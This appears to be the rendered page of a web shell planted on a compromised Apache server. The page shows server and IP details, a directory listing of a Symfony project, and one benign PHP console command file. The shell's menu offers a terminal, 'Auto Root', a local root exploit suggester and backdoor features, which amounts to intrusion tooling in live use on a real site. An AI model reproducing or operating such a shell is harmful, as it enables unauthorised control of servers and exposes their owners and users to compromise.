Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
src /
UserBundle /
Command /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
OauthClientCreateCommand.php
2.35
KB
-rwxrwxr-x
2026-05-25 12:28
UserListCommand.php
2.34
KB
-rwxrwxr-x
2026-04-02 12:06
UserListSyncCommand.php
2.74
KB
-rwxrwxr-x
2026-04-02 12:06
UserNetworkCommand.php
940
B
-rwxrwxr-x
2026-04-02 12:06
php_errors.log
1.3
KB
-rwxrwxr-x
2026-04-02 12:06
Save
Rename
<?php namespace App\UserBundle\Command; use Symfony\Bundle\FrameworkBundle\Command\ContainerAwareCommand; use Symfony\Component\Console\Input\InputArgument; use Symfony\Component\Console\Input\InputInterface; use Symfony\Component\Console\Input\InputOption; use Symfony\Component\Console\Output\OutputInterface; use App\UserBundle\Entity\UserList; /** * SF Guard User Command * * @author Otto Saayman <otto@igotafrica.com> * @package UserBundle * @subpackage Controller * @version 0.0.1 */ class UserNetworkCommand extends ContainerAwareCommand { protected function configure() { $this->setName('iga:user:network') ->setDescription('Update the networks of all users'); } protected function execute(InputInterface $input, OutputInterface $output) { $this->getContainer()->get('user_network.manager')->updateNetworks(); $output->writeln(sprintf('Network updates done')); } }